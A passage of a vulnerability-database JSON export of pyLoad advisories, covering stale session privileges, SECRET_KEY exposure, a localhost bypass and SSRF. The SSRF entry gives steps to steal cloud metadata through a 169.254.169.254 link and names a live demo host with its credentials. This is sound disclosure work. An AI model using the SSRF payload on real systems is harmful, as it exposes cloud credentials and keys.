"https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47890", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47890" }, { "reference_url": "https://github.com/advisories/GHSA-h73m-pcfw-25h2", "reference_id": "GHSA-h73m-pcfw-25h2", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-h73m-pcfw-25h2" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2", "reference_id": "GHSA-h73m-pcfw-25h2", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38748?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev75", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": 
"VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-tbkm-qa82-jkaw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzcg-gg18-9uhg" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev75" } ], "aliases": [ "CVE-2023-47890", "GHSA-h73m-pcfw-25h2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pgh8-2pmw-7ba7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89456?format=api", "vulnerability_id": "VCID-qg7b-ayq5-8bax", "summary": "pyLoad has Stale Session Privilege After Role/Permission Change 
(Privilege Revocation Bypass)\n### Summary\npyLoad caches `role` and `permission` in the session at login and continues to authorize requests using these cached values, even after an admin changes the user's role/permissions in the database.\n\nAs a result, an already logged-in user can keep old (revoked) privileges until logout/session expiry, enabling continued privileged actions.\n\nThis is a core authorization/session-consistency issue and is not resolved by toggling an optional security feature.\n\n### Details\nThe WebUI auth flow stores authorization state in session:\n\n- `src/pyload/webui/app/helpers.py:187-200`\n - `set_session(...)` writes:\n - `\"role\": user_info[\"role\"]`\n - `\"perms\": user_info[\"permission\"]`\n\nAuthorization checks later trust cached session values:\n\n- `src/pyload/webui/app/helpers.py:134-151`\n - `parse_permissions(...)` reads `session.get(\"role\")` / `session.get(\"perms\")`\n- `src/pyload/webui/app/helpers.py:225-230`\n - `is_authenticated(...)` only verifies `authenticated` and `api.user_exists(user)` (existence), not fresh role/permission\n- `src/pyload/webui/app/helpers.py:267-275`\n - `login_required(...)` uses `parse_permissions(s)` for allow/deny decisions\n- `src/pyload/webui/app/helpers.py:356-365`\n - API session auth path also trusts `s[\"role\"]` and `s[\"perms\"]`\n\nRole/permission updates are written to DB but active sessions are not invalidated/refreshed:\n\n- `src/pyload/webui/app/blueprints/json_blueprint.py:389-434`\n - `update_users(...)` calls `api.set_user_permission(...)` and returns\n- `src/pyload/core/api/__init__.py:1643-1645`\n - `set_user_permission(...)` updates DB role/permission only\n\nDefault exposure window is long:\n\n- `src/pyload/core/config/default.cfg:47`\n - `session_lifetime = 44640` minutes (~31 days)\n\nTherefore, privilege revocation is not enforced immediately for active sessions.\n\nNote on duplicates:\n- This appears distinct from CVE-2023-0227 (session validity after **user 
deletion**) because this report is about stale authorization after **role/permission changes** while the user still exists.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nRepro: stale session privilege after role/permission changes.\n\nThis PoC is source-based and leaves no persistent state.\nIt validates that:\n1) Role/permission are cached into session at login.\n2) Authorization checks read role/permission from session, not fresh DB values.\n3) User updates write DB permission/role without invalidating active sessions.\n4) Default session lifetime is long, increasing stale-privilege exposure window.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport pathlib\nimport re\nfrom typing import Iterable\n\n\nROOT = pathlib.Path(__file__).resolve().parent / \"pyload\" / \"src\" / \"pyload\"\n\n\ndef read(rel: str) -> str:\n return (ROOT / rel).read_text(encoding=\"utf-8\")\n\n\ndef has_any(text: str, patterns: Iterable[str]) -> bool:\n return all(re.search(p, text, re.MULTILINE) for p in patterns)\n\n\ndef main() -> None:\n helpers = read(\"webui/app/helpers.py\")\n json_blueprint = read(\"webui/app/blueprints/json_blueprint.py\")\n api_init = read(\"core/api/__init__.py\")\n default_cfg = (ROOT / \"core/config/default.cfg\").read_text(encoding=\"utf-8\")\n\n checks = {\n \"set_session_caches_role_perms\": has_any(\n helpers,\n [\n r'def\\\\s+set_session\\\\(',\n r'\"role\"\\\\s*:\\\\s*user_info\\\\[\"role\"\\\\]',\n r'\"perms\"\\\\s*:\\\\s*user_info\\\\[\"permission\"\\\\]',\n ],\n ),\n \"is_authenticated_only_checks_user_exists\": has_any(\n helpers,\n [\n r'def\\\\s+is_authenticated\\\\(',\n r'api\\\\s*=\\\\s*flask\\\\.current_app\\\\.config\\\\[\"PYLOAD_API\"\\\\]',\n r'return\\\\s+authenticated\\\\s+and\\\\s+api\\\\.user_exists\\\\(user\\\\)',\n ],\n ),\n \"parse_permissions_reads_session_cache\": has_any(\n helpers,\n [\n r'def\\\\s+parse_permissions\\\\(',\n r'session\\\\.get\\\\(\"role\"\\\\)\\\\s*==\\\\s*Role\\\\.ADMIN',\n 
r'session\\\\.get\\\\(\"perms\"\\\\)',\n ],\n ),\n \"login_required_uses_parse_permissions_session\": has_any(\n helpers,\n [\n r'def\\\\s+login_required\\\\(',\n r'if\\\\s+is_authenticated\\\\(s\\\\):',\n r'perms\\\\s*=\\\\s*parse_permissions\\\\(s\\\\)',\n ],\n ),\n \"api_session_auth_uses_cached_role_perms\": has_any(\n helpers,\n [\n r'if\\\\s+is_authenticated\\\\(s\\\\):',\n r'\"role\"\\\\s*:\\\\s*s\\\\[\"role\"\\\\]',\n r'\"permission\"\\\\s*:\\\\s*s\\\\[\"perms\"\\\\]',\n ],\n ),\n \"update_users_changes_db_without_session_invalidation\": has_any(\n json_blueprint,\n [\n r'def\\\\s+update_users\\\\(',\n r'api\\\\.set_user_permission\\\\(name,\\\\s*data\\\\[\"permission\"\\\\],\\\\s*data\\\\[\"role\"\\\\]\\\\)',\n r'return\\\\s+jsonify\\\\(True\\\\)',\n ],\n ),\n \"set_user_permission_only_updates_db\": has_any(\n api_init,\n [\n r'def\\\\s+set_user_permission\\\\(',\n r'self\\\\.pyload\\\\.db\\\\.set_permission\\\\(user,\\\\s*permission\\\\)',\n r'self\\\\.pyload\\\\.db\\\\.set_role\\\\(user,\\\\s*role\\\\)',\n ],\n ),\n \"default_session_lifetime_long\": re.search(\n r'session_lifetime\\\\s*:\\\\s*\"Session lifetime \\\\(minutes\\\\)\"\\\\s*=\\\\s*44640',\n default_cfg,\n re.MULTILINE,\n )\n is not None,\n }\n\n for name, ok in checks.items():\n print(f\"{name}={ok}\")\n\n stale_privilege_repro_success = all(checks.values())\n print(f\"stale_privilege_repro_success={stale_privilege_repro_success}\")\n\n # Cleanup: this PoC creates/modifies no runtime/data files.\n print(\"cleanup_done=True\")\n\n\nif __name__ == \"__main__\":\n 
main()\n```\n\n```text\nset_session_caches_role_perms=True\nis_authenticated_only_checks_user_exists=True\nparse_permissions_reads_session_cache=True\nlogin_required_uses_parse_permissions_session=True\napi_session_auth_uses_cached_role_perms=True\nupdate_users_changes_db_without_session_invalidation=True\nset_user_permission_only_updates_db=True\ndefault_session_lifetime_long=True\nstale_privilege_repro_success=True\ncleanup_done=True\n```\n\n### Impact\n- Privilege revocation is not immediate for active sessions.\n- A user can continue using stale, previously granted privileges (including admin) after downgrade/restriction.\n- This can allow continued access to privileged WebUI/API actions until session expiry or manual logout/session reset.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41133", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.1372", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41133" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/" } ], "url": 
"https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T18:31:55Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-66hx-chf7-3332" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41133", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41133" }, { "reference_url": "https://github.com/advisories/GHSA-66hx-chf7-3332", "reference_id": "GHSA-66hx-chf7-3332", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-66hx-chf7-3332" } ], "fixed_packages": [], "aliases": [ "CVE-2026-41133", "GHSA-66hx-chf7-3332" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qg7b-ayq5-8bax" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89793?format=api", "vulnerability_id": "VCID-qmbx-7s8b-4khw", "summary": "pyLoad's Session Not Invalidated After Permission Changes\n### Summary\nThe `pyload` application does not properly invalidate or modify sessions upon changes made to a user's permissions.\n\n### Details\nWhenever an administrator changes the permissions a specific account has, they do not expect that account to still be able to access data that its new permissions do not 
allow. This is not the case for the `pyload` application, as a user with a valid session can still perform the actions.\n\n### PoC\nTake a user with all the permissions, as shown below.\n\n\nWe now log in as this user.\n\n\nLet us now take away all the permissions.\n\n\nThe logged-in session can still be used to access everything in the application.\n\n\n### Impact\nShould permissions be taken away, the user is expected to no longer be able to execute the actions belonging to those permissions.", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/e95804fb0d06cbb07d2ba380fc494d9ff89b68c1" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-fj52-5g4h-gmq8" }, { "reference_url": "https://github.com/advisories/GHSA-fj52-5g4h-gmq8", "reference_id": "GHSA-fj52-5g4h-gmq8", "reference_type": "", "scores": [], "url": 
"https://github.com/advisories/GHSA-fj52-5g4h-gmq8" } ], "fixed_packages": [], "aliases": [ "GHSA-fj52-5g4h-gmq8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qmbx-7s8b-4khw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46798?format=api", "vulnerability_id": "VCID-tbkm-qa82-jkaw", "summary": "Improper Access Control\npyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21644", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.86508", "scoring_system": "epss", "scoring_elements": "0.99431", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21644" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/" } ], "url": "https://github.com/pyload/pyload/commit/bb22063a875ffeca357aaf6e2edcd09705688c40" }, { "reference_url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-21644", "reference_id": "CVE-2024-21644", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21644" }, { "reference_url": "https://github.com/advisories/GHSA-mqpq-2p68-46fv", "reference_id": "GHSA-mqpq-2p68-46fv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mqpq-2p68-46fv" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv", "reference_id": "GHSA-mqpq-2p68-46fv", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-01-09T19:55:57Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mqpq-2p68-46fv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38750?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev77", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": 
"VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77" } ], "aliases": [ "CVE-2024-21644", "GHSA-mqpq-2p68-46fv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tbkm-qa82-jkaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57592?format=api", "vulnerability_id": "VCID-u712-62py-aqgt", "summary": "pyLoad is vulnerable to attacks that bypass localhost restrictions, enabling the creation of arbitrary packages\nAny unauthenticated attacker can bypass the localhost restrictions posed by the application and utilize this to create arbitrary packages.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-7346", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00739", "scoring_system": "epss", "scoring_elements": "0.73275", "published_at": "2026-06-05T12:55:00Z" } ], "url": 
"https://api.first.org/data/v1/epss?cve=CVE-2025-7346" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36" }, { "reference_url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11" }, { "reference_url": "https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840" }, { 
"reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346", "reference_id": "CVE-2025-7346", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346" }, { "reference_url": "https://github.com/advisories/GHSA-x698-5hjm-w2m5", "reference_id": "GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-x698-5hjm-w2m5" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5", "reference_id": "GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-08T14:13:19Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5" } ], "fixed_packages": [], "aliases": [ "CVE-2025-7346", "GHSA-x698-5hjm-w2m5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u712-62py-aqgt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91149?format=api", "vulnerability_id": "VCID-ut9v-xcjn-ukb1", "summary": "pyLoad: Server-Side Request Forgery via Download Link Submission Enables Cloud Metadata Exfiltration\n## Summary\n\nPyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. 
On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init.\n\n## Details\n\nThe vulnerability exists in PyLoad's download package functionality (`/api/addPackage` endpoint), which directly passes user-supplied URLs to the download engine without validating the destination. The affected code in `src/pyload/webui/app/blueprints/api_blueprint.py`:\n\n```python\n@bp.route(\"/addPackage\", methods=[\"POST\"], endpoint=\"add_package\")\n@login_required\ndef add_package():\n name = flask.request.form[\"add_name\"]\n links = flask.request.form[\"add_links\"].split(\"\\n\")\n # ... validation omitted ...\n api.add_package(name, links, dest) # No URL validation\n```\n\nThe download engine in `src/pyload/core/managers/download.py` accepts any URL scheme and initiates HTTP requests to arbitrary destinations, including internal network addresses and cloud metadata endpoints.\n\n## Proof of Concept\n\n**Live Demo Instance:** http://143.244.141.81:8000 \n**Credentials:** `pyload` / `pyload`\n\n- Login into the pyload application\n- Navigate to package tab and enter the package name and fill the Link section with the following URL\n\n```\nhttp://169.254.169.254/metadata/v1.json\n```\n\n<img width=\"1851\" height=\"786\" alt=\"image\" src=\"https://github.com/user-attachments/assets/18e7aedf-7663-4a57-8f3e-5200be2c958e\" />\n\n- Now navigate to Files section and download the link.\n\n<img width=\"1429\" height=\"870\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9b8b9cd6-afb7-461c-b058-a3cc4f26e2e6\" />\n\n- It was observed that we are able to Read the Digital Ocean Metadata\n\n<img width=\"1872\" height=\"837\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d30d2d74-53e9-46f8-8206-894a275ac831\" />\n\nThe downloaded `v1.json` file contains sensitive cloud infrastructure data:\n- **Droplet ID**: Unique identifier for 
the instance\n- **Network Configuration**: Public/private IP addresses, VPC topology\n- **Authentication Keys**: Cloud provider auth tokens\n- **SSH Keys**: Public keys configured in droplet metadata\n- **Region and Datacenter**: Infrastructure location\n\n## Impact\n\n**Vulnerability Type:** Server-Side Request Forgery (SSRF) \n**CVSS Score:** 7.7 - 9.1 (High to Critical, depending on cloud deployment)\n\n### Affected Systems\n- All PyLoad installations (version 0.5.0 and potentially earlier)\n- **Critical Impact** on cloud deployments (AWS EC2, DigitalOcean, Google Cloud, Azure) where metadata contains:\n - IAM credentials (AWS)\n - SSH private keys (configured in user-data)\n - API tokens and secrets\n - Database credentials stored in cloud-init\n\n### Attack Requirements\n- Valid PyLoad user account (any role - ADMIN or USER)\n- Network connectivity to PyLoad instance\n\n### Security Impact\n1. **Cloud Metadata Theft**: Complete exfiltration of instance metadata\n2. **Lateral Movement**: Discovery and enumeration of internal network services\n3. **Credential Exposure**: Theft of cloud IAM credentials, SSH keys, API tokens\n4. **Infrastructure Mapping**: Network topology, IP addressing, service discovery\n\n## Remediation\n\nImplement URL validation in the download engine:\n1. Whitelist allowed URL schemes (http/https only)\n2. Block requests to private IP ranges (RFC 1918, link-local addresses)\n3. Block cloud metadata endpoints (169.254.169.254, metadata.google.internal, etc.)\n4. 
